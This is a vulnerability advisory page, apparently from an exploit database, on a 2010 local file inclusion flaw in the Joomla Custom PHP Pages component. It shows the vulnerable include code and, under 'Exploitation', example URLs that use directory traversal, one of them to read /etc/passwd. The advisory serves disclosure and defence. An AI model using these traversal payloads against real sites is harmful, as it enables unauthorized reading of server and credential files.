Joomla Custom PHP Pages Component LFI Vulnerability

vendor:

Joomla Custom PHP Pages Component

by:

Chip D3 Bi0s

7.5

CVSS

HIGH

LFI

CWE

Product Name: Joomla Custom PHP Pages Component

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2010

Joomla Custom PHP Pages Component LFI Vulnerability

The Joomla Custom PHP Pages Component is affected by a Local File Inclusion (LFI) vulnerability. The vulnerability allows an attacker to include arbitrary files from the server, potentially leading to remote code execution. The vulnerability exists in the 'php.php' file of the component, where user-supplied input is used without proper sanitization.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of the Joomla Custom PHP Pages Component. Additionally, input validation and sanitization should be implemented to prevent directory traversal attacks.

Source

Exploit-DB raw data:

Joomla Custom PHP Pages Component LFI Vulnerability
=====================================================

- Discovered by	: Chip D3 Bi0s
- Email		: chipdebios@gmail.com
- Date      	: 2010-05-11
- Where		: From Remote

----------------------------------
Affected software description

Application	: Joomla Custom PHP Pages Component 
Developer	: Gabe
Email		: gabe@fijiwebdesign.com
Type		: Non-Commercial
License		: GPL
Date Added	: 6 June 2008
Download	: http://joomla-php.googlecode.com/files/com_php0.1alpha1-J15.tar.gz


I. BACKGROUND

Joomla PHP Pages Component allows you to create simple PHP pages
and link them to the Joomla Menu. This allows you to easily create
a custom page without having to create a whole component. It is
similar to the PHP Module for Joomla, except that it is a full Component.

II. DESCRIPTION

Some LFI vulnerabilities exist in Joomla Custom PHP Pages Component.


III. ANALYSIS

The bug is in the following files, specifying the lines

/components/com_php/php.php

[35] $filename = $Params->get('file', '');
[36] $path = JPATH_ROOT.'/components/com_php/files/'.$filename;
    ...
[47] // evaluate the PHP
[48] echo '<div class="php_page">';
[49] if (is_file($path)) {
[50]	include($path);
[51] } else {
[52]	echo '<span class="note">Please choose a File</span>';

Explaining the above lines:
According to the code that files are opened, but the code is not
shows no filtration, so we can move into
directories. According to several extensions can be observed as
.html, .jpg, .js, which is not true of all .php



IV. EXPLOITATION

http://127.0.0.1/index.php?option=com_php&file=../images/phplogo.jpg
http://127.0.0.1/index.php?option=com_php&file=../js/ie_pngfix.js
http://127.0.0.1/index.php?option=com_php&file=../../../../../../../../../../etc/passwd


+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++